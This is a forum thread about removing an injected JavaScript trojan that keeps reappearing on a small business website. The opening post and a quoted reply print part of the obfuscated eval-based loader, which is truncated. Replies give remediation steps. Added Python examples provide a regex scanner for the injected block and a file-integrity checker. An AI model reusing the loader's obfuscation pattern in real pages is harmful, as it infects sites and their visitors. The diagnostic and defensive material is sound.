  1. #1  dkchapuis (SitePoint Zealot; Oklahoma, USA; joined Oct 2009; 103 posts)

    website has cryptic trojan - how do I remove

    A website that is built in Dreamweaver has a cryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with ESET and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


    Here is the script that gets added to each page.
    Code JavaScript:
    <!--0242d5--><script type="text/javascript" language="javascript" >
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
    .......
    7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
    any help would be appreciated.
    Last edited by Mittineague; Apr 12, 2013 at 13:59. Reason: please don't post mal code
    Master of going the long way to get nowhere
    Web Design Muskogee, Oklahoma
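    The injected block above has a recognisable shape: an HTML comment with a six-hex-digit tag, a script element, and a closing comment carrying the same tag. The following is an added example (not code from this thread or from any poster) of a small scanner that finds that shape across a web root and, optionally, strips it. The marker value 0242d5 and the file extensions are taken from the posts; the sample page, the temp-directory demo and all function names are constructed for the example. Stripping the block removes the symptom only; the posts below are right that the entry point still has to be closed.

```python
import re
from pathlib import Path

# Shape of the injection posted above: <!--TAG--> <script ...>...</script> <!--/TAG-->.
# The tag 0242d5 comes from the post; any six-hex-digit tag is accepted so a
# re-infection that uses a different tag is still caught.
INJECT_RE = re.compile(
    r"<!--(?P<tag>[0-9a-f]{6})-->\s*<script\b.*?</script>\s*<!--/(?P=tag)-->",
    re.DOTALL | re.IGNORECASE,
)


def find_injections(html: str) -> list[str]:
    """Return the marker tag of every injected block found in the page text."""
    return [m.group("tag") for m in INJECT_RE.finditer(html)]


def strip_injections(html: str) -> tuple[str, int]:
    """Remove every injected block; return (cleaned_html, number_removed)."""
    return INJECT_RE.subn("", html)


def scan_tree(root: Path, exts=(".html", ".htm", ".php", ".js"),
              clean: bool = False) -> dict[str, list[str]]:
    """Walk root and report {relative_path: [tags]} for infected files only.

    With clean=True the injected blocks are stripped and the file rewritten
    (take a backup first). Files are decoded as latin-1 so the round trip is
    byte-preserving whatever the page's real charset is.
    """
    hits: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if not (path.is_file() and path.suffix.lower() in exts):
            continue
        text = path.read_bytes().decode("latin-1")
        tags = find_injections(text)
        if tags:
            hits[path.relative_to(root).as_posix()] = tags
            if clean:
                cleaned, _ = strip_injections(text)
                path.write_bytes(cleaned.encode("latin-1"))
    return hits


# Constructed sample page (not from the thread): a normal page with one injected
# block before </body>, in the shape posted above, with the payload elided.
SAMPLE_PAGE = (
    "<html><body>\n<h1>Welcome</h1>\n"
    '<!--0242d5--><script type="text/javascript" language="javascript" >\n'
    "/* obfuscated payload elided */\n"
    "</script><!--/0242d5-->\n"
    "</body></html>\n"
)


def demo_scan() -> tuple[dict[str, list[str]], int]:
    """Write two constructed files into a temp dir, scan with cleaning enabled,
    then rescan; return (hits on the first pass, number of hits on the second)."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(SAMPLE_PAGE, encoding="utf-8")
        (root / "about.html").write_text("<html><body>clean</body></html>", encoding="utf-8")
        before = scan_tree(root, clean=True)
        after = scan_tree(root)
        return before, len(after)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # report only; add clean=True deliberately
        for rel, tags in scan_tree(Path(sys.argv[1])).items():
            print(f"{rel}: {tags}")
    else:
        print(demo_scan())
```

    Run it as `python3 scan_inject.py /path/to/webroot` (a placeholder path) to list infected files; the `clean=True` path is left off the command line on purpose so that removal is a conscious step taken after a backup.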

  2. #2
    TechnoBear (Life is not a malfunction; Argyll, Scotland; joined Jun 2011; 6,181 posts)
    I can't help with finding the source, but if you change your file permissions to read only, it might help to stop them being altered while you track it down.

  3. #3
    xhtmlcoder (Robert Wellock; location: A Maze of Twisty Little Passages; joined Apr 2002; 6,316 posts)
    Perhaps you could try the http://www.bleepingcomputer.com/ Security forums since you haven't located the infection vector. Also change your passwords.

  4. #4
    dklynn (Certified Ethical Hacker; Auckland; joined Feb 2002; 14,653 posts)
    Quote Originally Posted by dkchapuis:
    A website that is built in Dreamweaver has a cryptic Trojan, and I am not sure how to clean the site. I have scanned the servers and local machine with ESET and it isn't finding the source of the injections. However, if I delete the script that is the problem, the site is infected again within a day.


    Here is the script that gets added to each page.
    Code JavaScript:
    <!--0242d5--><script type="text/javascript" language="javascript" >
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!63!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!2
    .......
    7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=195;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-449!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
    any help would be appreciated.
    dk

    Your problem is that you have a breach in your security so (repeat of an earlier post):

    1. Immediately delete all FTP access except one (master for the account).

    2. Change the master password (cPanel and FTP) to a VERY STRONG one using an http://strongpasswordgenerator.com password of sufficient length.

    3. Use maldet scans (on an Apache server) which find and report all forms of malware (viruses, worms and SCRIPTS which can cause problems). This will enable you to find and remove scripts which can be embedded in html, php and js scripts. Repeat the maldet scans until there are no files detected then add a CRON to run maldet scans on a regular basis. Be aware that recovery will primarily consist of DELETING all html, php and js files and replacing them with originals (from your master copies).

    4. Additionally, I use a script (via CRON) to verify that files have remained unchanged over the last xx hours for "peace of mind."

    5. Database: If you are running WordPress or the like (database verification for admin accounts), create a new admin and delete all other admin records.

    6. Update all "canned scripts" (e.g., WP, Zencart, etc.) and be sure that they're kept updated in order to prevent further attacks via security problems discovered in those scripts. This includes their third party plug-ins, too.

    7. Uploaded files: Be sure to do a thorough check of any file uploaded to your website (I limit uploaded files to images and they are resized by GD before being saved to my "webspace").

    Both staff members' suggestions are good but too limited in scope. What you're allowing with JS like this is a barrage of SPAM being sent from your account. If you fail to close the security breach, your host should suspend your account then, failing application of good security, TERMINATE your account for breach of T&C (spamming).

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write mod_rewrite regex w/sample code) and Code Generator
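    Steps 3 and 4 above come down to two things: know what the clean files look like, and get told the moment one of them changes. The following is an added example (not DK's script, and not code from this thread) of the cron-driven integrity check step 4 describes: `baseline` records a SHA-256 manifest of the html/php/js files under the web root, and `check` reports files added, removed or modified since, exiting non-zero so cron mails you. The tracked extensions match the ones step 3 names; the manifest file name, the web-root path and the temp-directory demo are constructed for the example.

```python
import hashlib
import json
import sys
from pathlib import Path

# The file types step 3 above treats as the carriers of injected code;
# widen the set if you also want templates, .htaccess and the like tracked.
TRACKED_EXTS = {".html", ".htm", ".php", ".js"}


def sha256_file(path: Path) -> str:
    """Hash in chunks so large files never have to fit in memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every tracked file under root (POSIX-style relative path) to its hash."""
    return {
        path.relative_to(root).as_posix(): sha256_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file() and path.suffix.lower() in TRACKED_EXTS
    }


def compare_manifests(baseline: dict[str, str],
                      current: dict[str, str]) -> dict[str, list[str]]:
    """Classify drift since the baseline: files added, removed, or with a changed hash."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in shared if baseline[p] != current[p]),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario in a temporary directory: take a baseline, then
    simulate the kind of drift the thread describes and report it."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp) / "www"
        web.mkdir()
        (web / "index.html").write_text("<html><body>home</body></html>")
        (web / "about.html").write_text("<html><body>about</body></html>")
        (web / "logo.png").write_bytes(b"\x89PNG")   # untracked type, ignored
        baseline = build_manifest(web)
        # Simulated tampering: one page altered, a .php file dropped, one page gone
        (web / "index.html").write_text(
            "<html><body>home<script>/* injected */</script></body></html>")
        (web / "uploads").mkdir()
        (web / "uploads" / "dropped.php").write_text("<?php /* unexpected */ ?>")
        (web / "about.html").unlink()
        (web / "logo.png").write_bytes(b"changed")   # still ignored: untracked type
        return compare_manifests(baseline, build_manifest(web))


def main(argv: list[str]) -> int:
    """baseline WEBROOT MANIFEST writes the manifest; check WEBROOT MANIFEST
    prints drift and returns 1 if there is any (cron mails non-empty output)."""
    if len(argv) != 4 or argv[1] not in ("baseline", "check"):
        print("usage: integrity.py baseline|check WEBROOT MANIFEST.json", file=sys.stderr)
        return 2
    mode, root, manifest = argv[1], Path(argv[2]), Path(argv[3])
    if mode == "baseline":
        manifest.write_text(json.dumps(build_manifest(root), indent=1, sort_keys=True))
        return 0
    drift = compare_manifests(json.loads(manifest.read_text()), build_manifest(root))
    for kind, paths in drift.items():
        for rel in paths:
            print(f"{kind}: {rel}")
    return 1 if any(drift.values()) else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv) if len(sys.argv) > 1 else print(demo()) or 0)
```

    Take the baseline right after the site has been rebuilt from master copies (step 3), keep the manifest outside the web root and readable only by root, and schedule the check with something like `0 * * * * /usr/bin/python3 /root/integrity.py check /var/www/html /root/manifest.json` (paths are placeholders). Anything reported as modified is a candidate for restoring from the master copy; anything reported as added deserves a look before it is deleted.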

